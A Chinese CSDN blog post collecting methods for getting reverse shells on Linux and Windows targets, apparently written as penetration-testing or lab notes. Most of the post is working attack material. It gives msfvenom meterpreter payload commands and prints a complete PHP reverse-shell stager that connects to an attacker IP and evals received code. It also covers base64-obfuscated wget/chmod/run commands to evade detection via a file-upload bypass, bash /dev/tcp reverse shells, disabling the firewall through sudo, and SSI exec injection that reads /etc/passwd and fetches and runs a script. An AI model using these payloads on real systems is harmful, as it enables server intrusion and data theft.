Linux获得shell的方法大全

最新推荐文章于 2023-03-03 23:58:52 发布
置顶 最新推荐文章于 2023-03-03 23:58:52 发布
阅读量1.3k 收藏 6
点赞数 5
分类专栏: 笔记 文章标签: linux shell php 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441727/article/details/114821082
版权

上传webshell

生成webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw > /root/Desktop/shell.php

windows 靶机msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.4 lport=4444 -f exe >2.exe

使用burpsuite将shell.php上传(上面jpg改格式的都会吧)

反弹shell1

制作监听脚本PHP

msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw

然后你会得到一大串东西

/*<?php /**/ error_reporting(0); $ip = '172.16.101.13'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

截取留下下面这些传上去(注:这是我自己的IP生成的,不要傻乎乎的拿去用!)

<?php /**/ error_reporting(0); $ip = '172.16.101.13'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

然后设置监听服务

msfconsole
msf>use exploit/multi/handler
set payload  php/meterpreter/reverse_tcp
set lhost kail的IP
set lport 监听端口
run

然后上传你的php
然后运行你上传的php
http://IP/././你上传的php

反弹shell2

通过base64绕过防火墙检测

service apache2 start
echo 'wget http://kail的IP/shell  -O/tmp/shell' |base64 
echo 'chmod 777 /tmp/shell' |base64
echo '/tmp/shell' |base64
(执行代码都会产生一行字符串不要手抖关闭终端,不然重新打吧)

使用burpsuite修改内容(都用过吧kail的网页上传php经常用的)

"<?php shell exec(base64_decode('上面生成的字符串'));die();?>.php"
记得按顺序不然重新来

成功后就进入meterpreter

反弹shell3

开启监听
nc -nlvp 监听端口
如果存在命令执行就执行

echo 'bash -i>& /dev/tcp/kail的IP/监听端口/  0 >&1' |bash

echo命令脱shell处理

echo os.system('/bin/sh')

直接将用户提权至可使用命令

john:~$ ls
john:~$ ls
啥都不显示
$echo os.system('/bin/sh')
john@loacl:ls
1	2	3.sh

python交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

反弹shell4

如果存在命令执行

ls  -alh /home/用户名 显示详细用户的信息
ssh 用户名@localhost sudo -l 查看用户sudo命令的权限
ssh 用户名@localhost sudo ufw disable 关闭防火墙,要有root权限

启动监听端口

nc -nlvp 监听端口
ssh 用户名@loaclhost bash -i >& /dev/tcp/kail的ip/监听端口 0 >&1

反弹shell5

ssl注入
发现.shtml

<!--#exec cmd="cat /etc/passwd" -->  (查看passwd)
<!--#exec cmd="cd /root/" -->     (切换目录)

msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw > /root/shell.py

开启监听

msfconsole
msf>use exploit/multi/handler
set payload  php/meterpreter/reverse_tcp
set lhost kail的IP
set lport 监听端口
run 

<!--#exec cmd="wget http://kail的ip/shell.py"-->	(上传脚本)
<!--#exec cmd="chmod 777 shell.py"-->	(给脚本加权限)
<!--#exec cmd="Python shell.py"-->	(运行脚本)

成功后就进入meterpreter

Marx_Otto
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Linux Shell实现随机数多种方法
01-20
 shell脚本程序我们有那些获得随机数方法呢?  一、通过时间获得随机数(date)  这个也是我们经常用到的,可以说时间是的,也不会重复的,从这个里面获得同一时间的值。适应所有程序里面了。  例子:  ...
Linux shell 获得字符串所在行数及位置的方法
01-20
01 获取字符串所在的行数 方式一:用grep -n [root@root]# cat test apple bit create delect ...[root@root]# cat test | grep -n exe ...[root@root]# cat test | grep -n exe | awk -F : '{print $1}' ...
windows和linux包含日志文件和环境变量getshell
最新发布
记录学习,一起进步
03-03 542
windows和linux包含日志文件和环境变量getshell
从后台得到webshell十大技巧大汇总
weixin_34198583的博客
03-17 230
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell方法进行了...
后台得到webshell方法大汇总
Jessee Woo's Blog
08-05 1387
从后台得到webshell技巧大汇总   动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利
Shell 获取路径
IAlexanderI的专栏
04-09 1661
涉及到两个命令 dirname 获取目录名 readlink 获取文件绝对路径 dirname的用处是: 输出已经去除了尾部的”/”字符部分的名称;如果名称中不包含”/”, 则显示”.”(表示当前目录)。 例子: $ readlink -f deploy-small.sh /home/centos/tmp/706/deploy-small.sh $ dirname deplo...
Python下调用LinuxShell命令方法
09-20
在Python中,调用Linux Shell命令是通过内置的模块实现的,主要涉及到`os`模块和`subprocess`模块。本文将详细介绍这两种方法以及`commands`模块(在Python 3中已被弃用,但在这里仍然提及,以供了解)。 1. `os`...
Linux Shell 数组的创建及使用技巧
09-15
Linux Shell脚本编程中,数组是一种非常实用的数据结构,它可以存储多个相关的数据项,并且在处理批量数据或执行复杂的逻辑时发挥重要作用。本篇文章将深入探讨Linux Shell数组的创建、读取、赋值以及一些特殊的...
Linux实验shell脚本.doc
08-27
Linux实验shell脚本 Linux实验shell脚本是Linux系统中的一种自动化工具,使用shell脚本可以实现自动...本文档只是对shell脚本的基本概念和语法进行了简单的介绍,希望读者通过本文档可以获得基本的shell脚本编写能力。
Linux下使用Shell脚本获取终端宽度的解决方法
09-15
主要介绍了Linux下使用Shell脚本获取终端宽度的解决方法,需要的朋友可以参考下
不进后台拿shell的一种方法
08-12
不进后台拿shell的一种方法.zip.不进后台拿shell的一种方法.zip
教你如何拿下webshell
11-03
教你拿取webshell的45种方法,手动通过google hack技术及各种相应工具,让你找到上传点等其他很多漏洞上传木马拿到shell
一些拿shell技巧
weixin_34087307的博客
11-01 137
1.直接上传asp asa jsp cer php aspx htr cdx 格式的***,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2.有时上传图片格式的***,居然被程序检测拦截了,右键记事本打开***,在代码最前面加上gif89a,再数据库备份备份成asp格式的***拿下shell。3....
Linux Shell脚本攻略-在终端中显示输出
Arkardia的博客
01-08 5464
命令都是在终端会话中输入并执行的。打开终端时会出现一个提示符。 username@hostname$ $表示普通用户,#表示管理员用户root。root是Linux系统中权限最高的用户。 推荐使用普通用户(shell会在提示符中以$来表明这种身份)登录系统,然后借助sudo这类工具来运行特权命令。使用sudo <command> <argument>执行的效果和root一样 shell脚本通常以shebang起始 #!/bin/bash shebang是一个文本行,其中#!位
怎样拿shell的技巧
elsery
02-19 1万+
怎样拿shell的技巧结合本人和网络上的一些资料,仅供参考!经典的用户名密码 ‘or’=’or’ ‘or’1’=’1这2个密码在很多网站后台,QQ空间相册都可以登陆,不过不是100%而已….inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范
Linux 中执行Shell 脚本的方式(三种方法
热门推荐
timchen525的专栏
07-30 14万+
LinuxShell脚本的执行(三种方法
shell获取用户名和uid
超哥的专栏
04-28 1万+
# echo "$USER" # echo `id -u` # echo `whoami` # echo `who am i` # who # echo "$UID"
Linux shell编程.ppt
04-20
总之,"Linux shell编程"是一门实用性很强的课程,它的学习将为学习者提供实际的技能和解决问题的方法。无论是作为初学者还是有一定经验的人员,通过学习本课程,都能够掌握并应用好Linux shell编程的技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值